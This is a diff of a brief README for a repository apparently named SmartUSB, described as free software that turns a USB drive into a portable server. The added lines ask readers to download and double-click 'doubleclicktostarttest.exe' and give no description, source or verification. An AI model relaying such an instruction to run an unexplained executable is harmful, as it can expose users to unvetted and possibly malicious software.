ishaan123123-cybe/SmartUSB/README.md

 # SmartUSB
-Free software to create any USB into a portable server
+Free software to create any USB into a portable server.
+Please download file called "doubleclicktostarttest.exe" and follow prompts given..( guidation is given here)